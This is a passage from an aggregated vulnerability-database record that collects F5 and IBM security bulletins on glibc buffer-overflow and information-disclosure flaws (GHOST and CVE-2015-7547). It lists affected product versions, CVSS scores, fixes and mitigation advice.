\n4.0.0 - 4.0.5 \n3.5.2 \n3.4.0 - 3.4.1 \n3.3.2 | None | glibc \nWebSafe | None | 1.0.0 | None \nBIG-IP Edge Clients for Android | None | 2.0.0 - 2.0.5 | None \nBIG-IP Edge Clients for Apple iOS | None | 2.0.0 - 2.0.2 \n1.0.5 - 1.0.6 | None \nBIG-IP Edge Clients for Linux | None | 6035.x - 7110.x | None \nBIG-IP Edge Clients for MAC OS X | None | 6035.x - 7110.x | None \nBIG-IP Edge Clients for Windows | None | 6035.x - 7110.x | None \nBIG-IP Edge Clients Windows Phone 8.1 | None | 1.0.0.x | None \nBIG-IP Edge Portal for Android | None | 1.0.0 - 1.0.2 | None \nBIG-IP Edge Portal for Apple iOS | None | 1.0.0 - 1.0.3 | None \nFirePass Client | None | 5520.x - 6032.x | None \n \n* F5 has determined that these products contain vulnerable versions of glibc, and the vulnerable function is used in the product; however, at this time, F5 does not have evidence of any remote exploit vectors for this vulnerability. \n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should only permit access to F5 products over a secure network and limit login access to trusted users. For additional information, refer to [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\nFor information about using the BIG-IP ASM system and iRules to mitigate various GHOST exploits, refer to the [GHOST Vulnerability (CVE-2015-0235)](<https://devcentral.f5.com/articles/ghost-vulnerability-cve-2015-0235>) DevCentral article.\n\n**Note: **A DevCentral login is required to access this content.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K7312: Overview of the management port](<https://support.f5.com/csp/article/K7312>)\n", "cvss3": {}, "published": "2015-01-28T03:29:00", "type": "f5", "title": "GHOST: glibc gethostbyname buffer overflow vulnerability CVE-2015-0235", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2018-01-11T19:08:00", "id": "F5:K16057", "href": "https://support.f5.com/csp/article/K16057", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T18:45:11", "description": "Vulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists. F5 is working to provide a patch for this issue, and will update this article as soon as a patch becomes available.\n\nTo mitigate this vulnerability, you should only permit access to F5 products over a secure network and limit login access to trusted users. For additional information, refer to SOL13092: Overview of securing access to the BIG-IP system.\n\nFor information about using the BIG-IP ASM system and iRules to mitigate various GHOST exploits, refer to the\u00c2 [GHOST Vulnerability (CVE-2015-0235)](<https://devcentral.f5.com/articles/ghost-vulnerability-cve-2015-0235>) DevCentral article. \n \n**Note: **A DevCentral login is required to access this content.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL7312: Overview of the management port\n", "cvss3": {}, "published": "2015-01-27T00:00:00", "type": "f5", "title": "SOL16057 - GHOST: glibc gethostbyname buffer overflow vulnerability CVE-2015-0235", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2016-08-17T00:00:00", "id": "SOL16057", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/000/sol16057.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ibm": [{"lastseen": "2021-12-30T21:40:07", "description": "## Summary\n\nGNU glibc could allow a local attacker to obtain sensitive information, caused by the writing of DNS queries to random file descriptors under high load by the getaddrinfo() function. An attacker could exploit this vulnerability to obtain sensitive information.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2013-7423_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7423>) \n**DESCRIPTION:** GNU glibc could allow a local attacker to obtain sensitive information, caused by the writing of DNS queries to random file descriptors under high load by the getaddrinfo() function. An attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base Score: 1.2 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/100647_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/100647>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:H/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM Netezza Host Management 5.3.5.0 and prior\n\n## Remediation/Fixes\n\nIBM Netezza Host Management\n\n| _5.3.5.1_| [Link to Fix Central](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/Netezza+Platform&release=HOSTMGMT_5&platform=All&function=fixId&fixids=5.3.5.1-IM-Netezza-HOSTMGMT-fp96953&includeRequisites=1&includeSupersedes=0&downloadMethod=http&source=fc>) \n---|---|--- \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n18 December 2015: Original version published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSULQD\",\"label\":\"IBM PureData System\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud &amp; Data Platform\"},\"Component\":\"Administration\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"1.0.0\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {}, "published": "2019-10-18T03:10:29", "type": "ibm", "title": "Security Bulletin: IBM Netezza Host Management is vulnerable to a published glibc vulnerability (CVE-2013-7423)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7423"], "modified": "2019-10-18T03:10:29", "id": "AE21B16579A39A7500DE184D914C70B4ACB78A6622A77B295BE56BEEC705B523", "href": "https://www.ibm.com/support/pages/node/274975", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-28T22:16:17", "description": "## Summary\n\nIBM SONAS is shipped with GNU glibc, for which a fix is available for a security vulnerability.\n\n## Vulnerability Details\n\n \n**CVEID:** [CVE-2013-7423](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7423>) \n \n**DESCRIPTION:** GNU glibc could allow a local attacker to obtain sensitive information, caused by an issue that could occur under high load. An attacker could exploit this vulnerability to obtain sensitive information. \n \nCVSS Base Score: 1.2 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/100647> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:H/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM SONAS \nThe product is affected when running a code releases 1.5.0.0 to 1.5.2.1\n\n## Remediation/Fixes\n\nA fix for these issues is in version 1.5.2.2 of IBM SONAS. Customers running an affected version of SONAS should upgrade to 1.5.2.2 or a later version, so that the fix gets applied. \n \nPlease contact IBM support for assistance in upgrading your system.\n\n## Workarounds and Mitigations\n\nWorkaround(s): None \n \nMitigation(s): None\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n16 July 2015: First draft\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Internal Use Only\n\nCQ S1058616 [PSIRT 2810] IBM product record 49568 for SONAS and 49587 for IFS - Open Source GNU glibc vulnerability - Reported in 02/01/2015 X-Force Report\n\n[{\"Product\":{\"code\":\"STAV45\",\"label\":\"Network Attached Storage (NAS)-&gt;Scale Out Network Attached Storage\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"1.5.2.0\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"1.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {}, "published": "2018-06-18T00:09:54", "type": "ibm", "title": "Security Bulletin: GNU C library (glibc) vulnerability affects IBM SONAS (CVE-2013-7423)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7423"], "modified": "2018-06-18T00:09:54", "id": "40757940D0054030B6297C248ABB540ADB302DD9F89B94DDB202585009632F53", "href": "https://www.ibm.com/support/pages/node/690575", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-01-01T21:50:52", "description": "## Summary\n\nA GNU C library (glibc) stack-based buffer overflow in getaddrinfo() vulnerability affects IBM DataPower Gateways.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2015-7547](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547>) \n \n**DESCRIPTION:** GNU C Library (glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the nss_dns backend for the getaddrinfo() function when performing dual A/AAAA DNS queries. By sending a specially crafted DNS response, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \n \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/110662> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM DataPower Gateway appliances all versions through 6.0.0.18, 6.0.1.14, 7.0.0.11, 7.1.0.8 and 7.2.0.3\n\n## Remediation/Fixes\n\nFix is available in versions 6.0.0.19, 6.0.1.15, 7.0.0.12, 7.1.0.9 and 7.2.0.4. Refer to [APAR IT13989](<http://www-01.ibm.com/support/docview.wss?uid=swg1IT13989>) for URLs to download the fix. \n \nYou should verify applying this fix does not cause any compatibility issues. \n\n_For DataPower customers using versions 5.x and earlier versions, IBM recommends upgrading to a fixed, supported version/release/platform of the product. _\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n8 March 2016: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SS9H2Y\",\"label\":\"IBM DataPower Gateway\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud &amp; Data Platform\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF009\",\"label\":\"Firmware\"}],\"Version\":\"6.0.0;6.0.1;7.0.0;7.1;7.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-15T07:05:05", "type": "ibm", "title": "Security Bulletin: GNU C library (glibc) vulnerability affects IBM DataPower Gateways (CVE-2015-7547)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2018-06-15T07:05:05", "id": "30DA82A4D9D953FA05B77587C05ACDA5267AB07461D4D91A5A2F630AB91A48E7", "href": "https://www.ibm.com/support/pages/node/542877", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-30T21:53:52", "description": "## Summary\n\nA GNU C library (glibc) stack-based buffer overflow in getaddrinfo() vulnerability affects IBM Security Identity Manager Virtual Appliance \n \n\n\n## Vulnerability Details\n\n \n**CVEID:** [CVE-2015-7547](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547>) \n \n**DESCRIPTION:** GNU C Library (glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the nss_dns backend for the getaddrinfo() function when performing dual A/AAAA DNS queries. By sending a specially crafted DNS response, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/110662> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n \nIBM Security Identity Manager versions 7.0, 7.0.0.2, 7.0.0.3 and 7.0.1 \n\n## Remediation/Fixes\n\n \n\n\nProduct| VRMF| Remediation/First Fix \n---|---|--- \nIBM Security Identity Manager Virtual Appliance| 7.0.1.0| apply [7.0.1.0-ISS-SIM-IF0001](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FTivoli+Identity+Manager&fixids=7.0.1.0-ISS-SIM-IF0001&source=SAR>) \nIBM Security Identity Manager Virtual Appliance| 7.0.0.0 \n7.0.0.2 \n7.0.0.3| Upgrade firmware to [ISIM VA 7.0.1](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FTivoli+Identity+Manager&fixids=7.0.1-ISS-SIM-FP0000&source=SAR>) \nand \napply [7.0.1.0-ISS-SIM-IF0001](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FTivoli+Identity+Manager&fixids=7.0.1.0-ISS-SIM-IF0001&source=SAR>) \n \nOnce updates have been applied, any process using glibc will need to be restarted. Given that nearly all system processes use glibc, rebooting after upgrading is suggested. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of glibc including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n24 Feb 2016: Initial \n3 Mar 2016: First Publish\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSRMWJ\",\"label\":\"IBM Security Identity Manager\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Identity Manager Virtual Appliance\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"7.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-16T21:40:01", "type": "ibm", "title": "Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Identity Manager Virtual Appliance (CVE-2015-7547)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2018-06-16T21:40:01", "id": "907E0D74CE0C900AF8689D59A3185DB81C196044920978A4EE732195B24DEDA9", "href": "https://www.ibm.com/support/pages/node/543337", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-30T21:51:21", "description": "## Abstract\n\nBGQ_REDBOOKS (Doc Number=4680): Blue Gene/Q Security Bulletin notification Blue Gene&amp;#174; Knowledge Base document #773911444 : Security Bulletin: GNU C library (glibc) vulnerability affects (CVE-2015-7547) \nA GNU C library (glibc) stack-based buffer overflow in getaddrinfo() vulnerability affects Blue Gene/Q \nThe full details of this Knowledge Base document may be accessed at the Blue Gene Knowledge Base document website . \nDoc number: 4680 Published date: 20160331\n\n## Content\n\nBGQ_REDBOOKS (Doc Number=4680): Blue Gene/Q Security Bulletin notification \n\nBlue Gene\u00ae Knowledge Base document #773911444 : Security Bulletin: GNU C library (glibc) vulnerability affects (CVE-2015-7547) \n\nA GNU C library (glibc) stack-based buffer overflow in getaddrinfo() vulnerability affects Blue Gene/Q \n\nThe full details of this Knowledge Base document may be accessed at the [ Blue Gene Knowledge Base document website](<https://www-912.ibm.com/i_dir/IBMBlueGeneLKB.nsf/614bb6353bc6f60d86257036006f743d/df9563c362c94e6486257f770062a40b?OpenDocument&Highlight=2,vulnerability>). \n\n_Doc number: 4680_ | _Published date: 20160331_ \n---|--- \n \n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SWG10\",\"label\":\"AIX\"},\"Component\":\"\",\"ARM Category\":[],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB08\",\"label\":\"Cognitive Systems\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-31T14:58:09", "type": "ibm", "title": "BGQ_REDBOOKS (Doc Number=4680): Blue Gene/Q Security Bulletin notification", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2016-03-31T14:58:09", "id": "D44A21C5045B081F961B0359D983B64AE4513E83763BDBA91D48D4282CFAEFFE", "href": "https://www.ibm.com/support/pages/node/5743185", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T22:12:51", "description": "## Summary\n\nA GNU C library (glibc) stack-based buffer overflow in getaddrinfo() vulnerability affects IBM Security Network Protection.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7547_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547>)** \nDESCRIPTION:** GNU C Library (glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the nss_dns backend for the getaddrinfo() function when performing dual A/AAAA DNS queries. By sending a specially crafted DNS response, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110662_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110662>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Security Network Protection 5.3.1 \nIBM Security Network Protection 5.3.2\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _Remediation/First Fix_ \n---|---|--- \nIBM Security Network Protection| Firmware version 5.3.1| Download Firmware 5.3.1.8 from [IBM Security License Key and Download Center](<https://ibmss.flexnetoperations.com/control/isdl/home>) and upload and install via the Available Updates page of the Local Management Interface. \nIBM Security Network Protection| Firmware version 5.3.2| Download Firmware 5.3.2.2 from [IBM Security License Key and Download Center](<https://ibmss.flexnetoperations.com/control/isdl/home>) and upload and install via the Available Updates page of the Local Management Interface. \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< 